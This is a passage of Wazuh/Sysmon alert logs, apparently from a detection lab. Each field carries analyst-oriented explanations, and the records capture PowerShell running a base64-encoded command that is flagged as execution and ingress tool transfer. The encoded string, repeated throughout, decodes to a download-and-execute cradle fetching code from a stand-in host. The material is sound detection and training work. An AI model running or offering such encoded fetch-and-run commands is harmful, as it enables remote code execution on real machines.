LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00}
ParentProcessId: 2372
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:09.726 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc61-680a-550a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3924 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.823937 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:11.1938944Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280969 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:11.163
ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00}
ProcessId: 3924
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dobv25yk.2l4.ps1
CreationUtcTime: 2025-04-24 22:34:11.163
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:11.163 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc61-680a-550a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3924 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dobv25yk.2l4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:11.163 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.826701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:19.4863479Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281055 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:18.124
ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00}
ProcessId: 12136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00}
ParentProcessId: 11716
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:18.124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.834771 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:19.6850661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281056 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:19.648
ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00}
ProcessId: 12136
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4o4hfpih.vzn.ps1
CreationUtcTime: 2025-04-24 22:34:19.648
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:19.648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12136 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4o4hfpih.vzn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:19.648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534207.837539 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:42.0199627Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281347 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:40.473
ProcessGuid: {94294ddc-bc80-680a-710a-000000000e00}
ProcessId: 12900
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00}
ParentProcessId: 2488
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:40.473 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc80-680a-710a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
